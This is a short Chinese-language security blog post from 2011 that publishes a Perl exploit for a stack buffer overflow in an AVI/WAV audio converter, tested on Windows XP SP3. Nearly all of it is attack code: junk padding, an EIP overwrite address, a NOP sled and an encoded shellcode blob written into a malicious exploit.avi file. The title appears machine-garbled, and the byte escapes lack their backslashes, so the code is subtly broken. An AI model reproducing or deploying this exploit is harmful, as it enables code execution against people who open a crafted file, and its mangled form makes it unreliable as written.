Rever音频转换器(AVI WAV)堆栈转炉漏洞

Tested on: Windows XP SP3

my $jnk="x41" x 4300 ;
my $eip = "x73x45x95x9C" ;
my $nop = "x90" x 20;
$shellcode = $shellcode
."xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" .
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" .
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" .
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" .
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" .
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" .
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" .
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" .
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" .
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" .
"x7fxe8x7bxca";

open(MYFILE,'>>exploit.avi');

print MYFILE $jnk.$eip.$nop.$shellcode;

close(MYFILE);

本文固定链接: https://www.unhonker.com/bug/283.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年09月18日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Rever音频转换器(AVI WAV)堆栈转炉漏洞 | 90' s Blog|关注网络信息安全

Rever音频转换器(AVI WAV)堆栈转炉漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!